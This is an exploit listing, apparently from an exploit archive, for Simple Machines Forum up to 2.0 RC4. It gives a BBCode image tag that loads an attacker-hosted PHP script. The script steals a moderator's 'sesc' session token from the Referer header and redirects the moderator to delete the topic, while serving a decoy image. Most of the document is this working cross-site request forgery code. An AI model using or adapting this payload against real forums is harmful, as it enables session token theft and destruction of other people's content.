Simple Machines Forum <= 2.0 RC4 Sesc theft (XSRF)

# Exploit Title: Simple Machines Forum <= 2.0 RC4 Sesc theft (XSRF)
# Author: Xianur0
# Author Mail: xianur0.null[at] gmail.com
# Software Link: http://www.simplemachines.org

Exploit Code:

[img]http://attacker/exploit.php[/img]

Now need to someone with permissions to cite or edit a message (having the preview turned on) :P


exploit.php:

<?php
// By Xianur0
$imagen = "real-image.jpg";
error_reporting(0);
function delete($path,$topic,$sesc) {
if(!preg_match("/index.php$/",$path)) $path = preg_replace("/\/([^\/]+)$/","/",$path);


header("Location: ".$path."?action=removetopic2;topic=".$topic.";sesc=".$sesc,TRUE,302);
}

function mostrarimagen($imagen) {
header("Content-Type: image/jpeg");
print file_get_contents($imagen);


}

if(isset($_SERVER['HTTP_REFERER']) && !empty($_SERVER['HTTP_REFERER']) && preg_match("/sesc=(.{32})/i",$_SERVER['HTTP_REFERER'],$matches) && preg_match("/topic=([^;]+)/i",$_SERVER['HTTP_REFERER'],$matchess) && preg_match("/^([^\?]+)/i",$_SERVER['HTTP_REFERER'],$matchesss)) {


$sesc = $matches[1];
$topic = $matchess[1];
$path = $matchesss[1];
delete($path,$topic,$sesc);
exit;
}
mostrarimagen($imagen);
?>



#  0day.today [2018-01-01]  #